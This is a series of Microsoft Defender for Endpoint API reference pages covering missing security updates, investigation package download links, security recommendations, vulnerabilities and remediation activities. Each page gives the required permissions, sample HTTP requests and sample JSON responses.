-description: Retrieves missing security updates by software ID
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get missing KBs by software ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Retrieves missing KBs (security updates) by software ID
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/Software/{Id}/getmissingkbs
-```
-
-## Request header
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, with the specified software missing kb data in the body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/getmissingkbs
-```
-
-### Response
-
-Here is an example of the response.
--
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicProductFixDto)",
- "value": [
- {
- "id": "4540673",
- "name": "March 2020 Security Updates",
- "productsNames": [
- "edge"
- ],
- "url": "https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540673",
- "machineMissedOn": 240,
- "cveAddressed": 14
- },
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Package Sas Uri https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-package-sas-uri.md
- Title: Get package SAS URI API
-description: Use this API to get a URI that allows downloading an investigation package.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get package SAS URI API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-Get a URI that allows downloading of an [Investigation package](collect-investigation-package.md).
-
-> [!IMPORTANT]
->
-> - These actions are only available for devices on Windows 10, version 1703 or later, and on Windows 11.
-
-## Limitations
-
-Rate limitations for this API are 2 calls per minute and 120 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Access the Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|''Read all machine profiles''
-Application|"Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.CollectForensics|'Collect forensics'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Alerts Investigation' (For more information, see [Create and manage roles](../user-roles.md))
-> - The user needs to have access to the device, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET https://api.security.microsoft.com/api/machineactions/{machine action id}/getPackageUri
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with object that holds the link to the package in the "value" parameter. This link is valid for a short time and should be used immediately for downloading the package to a local storage. If the machine action for the collection exists but isn't complete, this returns 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/machineactions/7327b54fd718525cbca07dacde913b5ac3c85673/GetPackageUri
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-HTTP/1.1 200 Ok
-Content-type: application/json
-
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Edm.String",
- "value": "\"https://userrequests-us.securitycenter.windows.com:443/safedownload/WDATP_Investigation_Package.zip?token=gbDyj7y%2fbWGAZjn2sFiZXlliBTXOCVG7yiJ6mXNaQ9pLByC2Wxeno9mENsPFP3xMk5l%2bZiJXjLvqAyNEzUNROxoM2I1er9dxzfVeBsxSmclJjPsAx%2btiNyxSz1Ax%2b5jaT5cL5bZg%2b8wgbwY9urXbTpGjAKh6FB1e%2b0ypcWkPm8UkfOwsmtC%2biZJ2%2bPqnkkeQk7SKMNoAvmh9%2fcqDIPKXGIBjMa0D9auzypOqd8bQXp7p2BnLSH136BxST8n9IHR4PILvRjAYW9kvtHkBpBitfydAsUW4g2oDZSPN3kCLBOoo1C4w4Lkc9Bc3GNU2IW6dfB7SHcp7G9p4BDkeJl3VuDs6esCaeBorpn9FKJ%2fXo7o9pdcI0hUPZ6Ds9hiPpwPUtz5J29CBE3QAopCK%2fsWlf6OW2WyXsrNRSnF1tVE5H3wXpREzuhD7S4AIA3OIEZKzC4jIPLeMu%2bazZU9xGwuc3gICOaokbwMJiZTqcUuK%2fV9YdBdjdg8wJ16NDU96Pl6%2fgew2KYuk6Wo7ZuHotgHI1abcsvdlpe4AvixDbqcRJthsg2PpLRaFLm5av44UGkeK6TJpFvxUn%2f9fg6Zk5yM1KUTHb8XGmutoCM8U9er6AzXZlY0gGc3D3bQOg41EJZkEZLyUEbk1hXJB36ku2%2bW01cG71t7MxMBYz7%2bdXobxpdo%3d%3bRWS%2bCeoDfTyDcfH5pkCg6hYDmCOPr%2fHYQuaUWUBNVnXURYkdyOzVHqp%2fe%2f1BNyPdVoVkpQHpz1pPS3b5g9h7IMmNKCk5gFq5m2nPx6kk9EYtzx8Ndoa2m9Yj%2bSaf8zIFke86YnfQL4AYewsnQNJJh4wc%2bXxGlBq7axDcoiOdX91rKzVicH3GSBkFoLFAKoegWWsF%2fEDZcVpF%2fXUA1K8HvB6dwyfy4y0sAqnNPxYTQ97mG7yHhxPt4Pe9YF2UPPAJVuEf8LNlQ%2bWHC9%2f7msF6UUI4%2fca%2ftpjFs%2fSNeRE8%2fyQj21TI8YTF1SowvaJuDc1ivEoeopNNGG%2bGI%2fX0SckaVxU9Hdkh0zbydSlT5SZwbSwescs0IpzECitBbaLUz4aT8KTs8T0lvx8D7Te3wVsKAJ1r3iFMQZrlk%2bS1WW8rvac7oHRx2HKURn1v7fDIQWgJr9aNsNlFz4fLJ50T2qSHuuepkLVbe93Va072aMGhvr09WVKoTpAf1j2bcFZZU6Za5PxI32mr0k90FgiYFJ1F%2f1vRDrGwvWVWUkR3Z33m4g0gHa52W1FMxQY0TJIwbovD6FaSNDx7xhKZSd5IJ7r6P91Gez49PaZRcAZPjd%2bfbul3JNm1VqQPTLohT7wa0ymRiXpSST74xtFzuEBzNSNATdbngj3%2fwV4JesTjZjIj5Dc%3d%3blumqauVlFuuO8MQffZgs0tLJ4Fq6fpeozPTdDf8Ll6XLegi079%2b4mSPFjTK0y6eohstxdoOdom2wAHiZwk0u4KLKmRkfYOdT1wHY79qKoBQ3ZDHFTys9V%2fcwKGl%2bl8IenWDutHygn5IcA1y7GTZj4g%3d%3d\""
-}
-```
security Get Recommendation By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-recommendation-by-id.md
- Title: Get recommendation by Id
-description: Retrieves a security recommendation by its ID.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get recommendation by ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves a security recommendation by its ID.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|SecurityRecommendation.Read.All|'Read Threat and Vulnerability Management security recommendation information'
-Delegated (work or school account)|SecurityRecommendation.Read|'Read Threat and Vulnerability Management security recommendation information'
-
-## HTTP request
-
-```http
-GET /api/recommendations/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the security recommendations in the body.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Recommendations/$entity",
- "id": "va-_-google-_-chrome",
- "productName": "chrome",
- "recommendationName": "Update Chrome",
- "weaknesses": 38,
- "vendor": "google",
- "recommendedVersion": "",
- "recommendationCategory": "Application",
- "subCategory": "",
- "severityScore": 0,
- "publicExploit": false,
- "activeAlert": false,
- "associatedThreats": [],
- "remediationType": "Update",
- "status": "Active",
- "configScoreImpact": 0,
- "exposureImpact": 3.9441860465116285,
- "totalMachineCount": 6,
- "exposedMachinesCount": 5,
- "nonProductivityImpactedAssets": 0,
- "relatedComponent": "Chrome"
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Recommendation Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-recommendation-machines.md
- Title: List devices by recommendation
-description: Retrieves a list of devices associated with the security recommendation.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List devices by recommendation
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves a list of devices associated with the security recommendation.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|SecurityRecommendation.Read.All|'Read Threat and Vulnerability Management security recommendation information'
-Delegated (work or school account)|SecurityRecommendation.Read|'Read Threat and Vulnerability Management security recommendation information'
-
-## HTTP request
-
-```http
-GET /api/recommendations/{id}/machineReferences
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the list of devices associated with the security recommendation.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome/machineReferences
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
- "value": [
- {
- "id": "e058770379bc199a9c179ce52a23e16fd44fd2ee",
- "computerDnsName": "niw_pc",
- "osPlatform": "Windows10" "Windows11",
- "rbacGroupName": "GroupTwo"
- }
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Recommendation Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-recommendation-vulnerabilities.md
- Title: List vulnerabilities by recommendation
-description: Retrieves a list of vulnerabilities associated with the security recommendation.
------- m365-security-- tier3 -- must-keep--- Previously updated : 12/18/2020--
-# List vulnerabilities by recommendation
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves a list of vulnerabilities associated with the security recommendation.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management security recommendation information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management security recommendation information'
-
-## HTTP request
-
-```http
-GET /api/recommendations/{id}/vulnerabilities
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, with the list of vulnerabilities associated with the security recommendation.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome/vulnerabilities
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics.Contracts.PublicAPI.PublicVulnerabilityDto)",
- "value": [
- {
- "id": "CVE-2019-13748",
- "name": "CVE-2019-13748",
- "description": "Insufficient policy enforcement in developer tools in Google Chrome prior to 79.0.3945.79 allowed a local attacker to obtain potentially sensitive information from process memory via a crafted HTML page.",
- "severity": "Medium",
- "cvssV3": 6.5,
- "exposedMachines": 0,
- "publishedOn": "2019-12-10T00:00:00Z",
- "updatedOn": "2019-12-16T12:15:00Z",
- "publicExploit": false,
- "exploitVerified": false,
- "exploitInKit": false,
- "exploitTypes": [],
- "exploitUris": []
- }
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Remediation All Activities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-remediation-all-activities.md
- Title: List all remediation activities
-description: Returns information about all remediation activities.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/25/2021--
-# List all remediation activities
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink).
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Returns information about all remediation activities.
-
-[Learn more about remediation activities](../tvm-remediation.md).
-
-**URL:** GET: /api/remediationTasks
-<br>Supports [OData V4 queries](https://www.odata.org/documentation/).
-<br>OData supported operators:
-<br>```$filter``` on: ```createdon``` and ```status``` properties.
-<br>```$top``` with max value of 10,000.
-<br>```$skip```.
-<br>See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|RemediationTasks.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|RemediationTask.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-## Properties
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-Category|String|Category of the remediation activity (Software/Security configuration)|Software
-completerEmail|String|If the remediation activity was manually completed by someone, this column contains their email|Null
-completerId|String|If the remediation activity was manually completed by someone, this column contains their object ID|Null
-completionMethod|String|A remediation activity can be completed "automatically" (if all the devices are patched) or "manually" by a person who selects "mark as completed"|Automatic
-createdOn|DateTime|Time this remediation activity was created|2021-01-12T18:54:11.5499478Z
-Description|String|Description of this remediation activity|Update Microsoft Silverlight to a later version to mitigate known vulnerabilities affecting your devices.
-dueOn|DateTime|Due date the creator set for this remediation activity|2021-01-13T00:00:00Z
-fixedDevices|.|The number of devices that have been fixed|2
-ID|String|ID of this remediation activity|097d9735-5479-4899-b1b7-77398899df92
-nameId|String|Related product name|Microsoft Silverlight
-Priority|String|Priority the creator set for this remediation activity (High\Medium\Low)|High
-productId|String|Related product ID|microsoft-_-silverlight
-productivityImpactRemediationType|String|A few configuration changes could be requested only for devices that don't affect users. This value indicates the selection between "all exposed devices" or "only devices with no user impact."|AllExposedAssets
-rbacGroupNames|String|Related device group names|[ "Windows Servers", "Windows 11", "Windows 10" ]
-recommendedProgram|String|Recommended program to upgrade to|Null
-recommendedVendor|String|Recommended vendor to upgrade to|Null
-recommendedVersion|String|Recommended version to update/upgrade to|Null
-relatedComponent|String|Related component of this remediation activity (similar to the related component for a security recommendation)|Microsoft Silverlight
-requesterEmail|String|Creator email address|globaladmin@UserName.contoso.com
-requesterId|String|Creator object ID|r647211f-2e16-43f2-a480-16ar3a2a796r
-requesterNotes|String|The notes (free text) the creator added for this remediation activity|Null
-Scid|String|SCID of the related security recommendation|Null
-Status|String|Remediation activity status (Active/Completed)|Active
-statusLastModifiedOn|DateTime|Date when the status field was updated|2021-01-12T18:54:11.5499487Z
-targetDevices|Long|Number of exposed devices that this remediation is applicable to|43
-Title|String|Title of this remediation activity|Update Microsoft Silverlight
-Type|String|Remediation type|Update
-vendorId|String|Related vendor name|Microsoft
-
-## Example
-
-### Request example
-
-```http
-GET https://api.securitycenter.windows.com/api/remediationtasks/
-```
-
-### Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#RemediationTasks",
- "value": [
- {
- "id": "03942ef5-aewb-4w6e-b555-d6a97013844w",
- "title": "Update Microsoft Silverlight",
- "createdOn": "2021-02-10T13:20:36.4718166Z",
- "requesterId": "65548a1d-ef00-4a7a-8d19-1b967b5c36f4",
- "requesterEmail": "user1@contoso.com",
- "status": "Active",
- "statusLastModifiedOn": "2021-02-10T13:20:36.4719698Z",
- "description": "Update Silverlight to a later version to mitigate 55 known vulnerabilities affecting your devices. Doing so can help lessen the security risk to your organization due to versions which have reached their end-of-support.",
- "relatedComponent": "Microsoft Silverlight",
- "targetDevices": 18511,
- "rbacGroupNames": [
- "UnassignedGroup",
- "hhh"
- ],
- "fixedDevices": 2866,
- "requesterNotes": "test",
- "dueOn": "2021-02-11T00:00:00Z",
- "category": "Software",
- "productivityImpactRemediationType": null,
- "priority": "Medium",
- "completionMethod": null,
- "completerId": null,
- "completerEmail": null,
- "scid": null,
- "type": "Update",
- "productId": "microsoft-_-silverlight",
- "vendorId": "microsoft",
- "nameId": "silverlight",
- "recommendedVersion": null,
- "recommendedVendor": null,
- "recommendedProgram": null
- }
- ]
-}
-```
-
-## See also
--- [Remediation methods and properties](get-remediation-methods-properties.md)-- [Get one remediation activity by ID](get-remediation-one-activity.md)-- [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md)-- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Remediation Exposed Devices Activities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-remediation-exposed-devices-activities.md
- Title: List exposed devices of one remediation activity
-description: Returns information about exposed devices for the specified remediation task.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/25/2021--
-# List exposed devices of one remediation activity
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API Description
-
-Returns information about exposed devices for the specified remediation task.
-
-[Learn more about remediation activities](../tvm-remediation.md).
-
-## List exposed devices associated with a remediation task (id)
-
-**URL:** GET: /api/remediationTasks/\{id\}/machineReferences
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|RemediationTasks.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|RemediationTask.Read.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-## Properties details
-
-Property (id)|Data type|Description|Example
-:|:|:|:
-id|String|Device ID|w2957837fwda8w9ae7f023dba081059dw8d94503
-computerDnsName|String|Device name|PC-SRV2012R2Foo.UserNameVldNet.local
-osPlatform|String|Device operating system|WindowsServer2012R2
-rbacGroupName|String|Name of the device group this device is associated with|Servers
-
-## Example
-
-### Request example
-
-```http
-GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c6e-b555-d6a97013844c/machinereferences
-```
-
-### Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineReferences",
- "value": [
- {
- "id": "3cb5df6bb3640a2d37ad09fcd357b182d684fafc",
- "computerDnsName": "ComputerPII_2ea21b2d97c9df23c143ad9e3e454cb674232529.DomainPII_21eed80b086e79bdfa178eabfa25e8be9acfa346.corp.contoso.com",
- "osPlatform": "WindowsServer2016",
- "rbacGroupName": "UnassignedGroup",
-
- },
- {
- "id": "3d9b1ca53e8f077199c7dcbfc9dbfa78f9bf1918",
- "computerDnsName": "ComputerPII_001d606fc149567c192747f48fae304b43c0ddba.DomainxPII_21eed80b086e79bdfa178eabfa25e8be9acfa346.corp.contoso.com",
- "osPlatform": "WindowsServer2012R2",
- "rbacGroupName": "UnassignedGroup",
-
- },
- {
- "id": "3db8b27e6172951d7ea2e2d75945abec56feaf82",
- "computerDnsName": "ComputerPII_ce60cfbjj4b82a091deb5eae560332bba99a9bd7.DomainPII_0bc1aee0fa396d175e514bd61a9e7a5b2b07ee8e.corp.contoso.com",
- "osPlatform": "WindowsServer2016",
- "rbacGroupName": "UnassignedGroup",
-
- },
- {
- "id": "3bad326dcda5b53fab47408cd4a7080f3f3cc8ab",
- "computerDnsName": "ComputerPII_b6b35960dd6539d1d1cef5ada02e235e7b357408.DomainPII_21eed80b089e76bdfa178eadfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "WindowsServer2012R2",
- "rbacGroupName": "UnassignedGroup",
-
- }
-]
-}
-```
-
-## See also
--- [Remediation methods and properties](get-remediation-methods-properties.md)-- [Get one remediation activity by Id](get-remediation-one-activity.md)-- [List all remediation activities](get-remediation-all-activities.md)-- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Remediation Methods Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-remediation-methods-properties.md
- Title: Remediation activity methods and properties
-description: The API response contains Microsoft Defender Vulnerability Management remediation activities created in your tenant. You can request all the remediation activities, only one remediation activity, or information about exposed devices for a selected remediation task.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/24/2021--
-# Remediation activity methods and properties
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-The API response contains [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md) remediation activities that have been created in your tenant.
-
-## Methods
-
-Method|Data type|Description
-:|:|:
-[List all remediation activities](get-remediation-all-activities.md)|Investigation collection|Returns information about all remediation activities.
-[List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md)|Investigation entity|Returns information about exposed devices for the specified remediation activity.
-[Get one remediation activity by ID](get-remediation-one-activity.md)|Investigation entity|Returns information for the specified remediation activity.
-
-Learn more about [remediation activities](../tvm-remediation.md).
-
-## Properties
-
-Property ID|Data type|Description
-:|:|:
-Category|String|Category of the remediation activity (Software/Security configuration)
-completerEmail|String|If the remediation activity was manually completed by someone, this column contains their email
-completerId|String|If the remediation activity was manually completed by someone, this column contains their object ID
-completionMethod|String|A remediation activity can be completed "automatically" (if all the devices are patched) or "manually" by a person who selects "mark as completed."
-createdOn|DateTime|Time this remediation activity was created
-Description|String|Description of this remediation activity
-dueOn|DateTime|Due date the creator set for this remediation activity
-fixedDevices||The number of devices that have been fixed
-ID|String|ID of this remediation activity
-nameId|String|Related product name
-Priority|String|Priority the creator set for this remediation activity (High\Medium\Low)
-productId|String|Related product ID
-productivityImpactRemediationType|String|A few configuration changes could be requested only for devices that don't affect users. This value indicates the selection between "all exposed devices" or "only devices with no user impact."
-rbacGroupNames|String|Related device group names
-recommendedProgram|String|Recommended program to upgrade to
-recommendedVendor|String|Recommended vendor to upgrade to
-recommendedVersion|String|Recommended version to update/upgrade to
-relatedComponent|String|Related component of this remediation activity (similar to the related component for a security recommendation)
-requesterEmail|String|Creator email address
-requesterId|String|Creator object ID
-requesterNotes|String|The notes (free text) the creator added for this remediation activity
-Scid|String|SCID of the related security recommendation
-Status|String|Remediation activity status (Active/Completed)
-statusLastModifiedOn|DateTime|Date when the status field was updated
-targetDevices|Long|Number of exposed devices that this remediation is applicable to
-Title|String|Title of this remediation activity
-Type|String|Remediation type
-vendorId|String|Related vendor name
-
-## See also
--- [Get one remediation activity by ID](get-remediation-one-activity.md)--- [List all remediation activities](get-remediation-all-activities.md)--- [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md)--- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)--- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Remediation One Activity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-remediation-one-activity.md
- Title: Get one remediation activity by ID
-description: Returns information for the specified remediation activity.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/25/2021--
-# Get one remediation activity by ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink).
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Returns information for the specified remediation activity. Presents the same columns as [Get all remediation activity](get-remediation-all-activities.md)", but returns results _only for the one specified remediation activity_.
-
-[Learn more about remediation activities](../tvm-remediation.md).
-
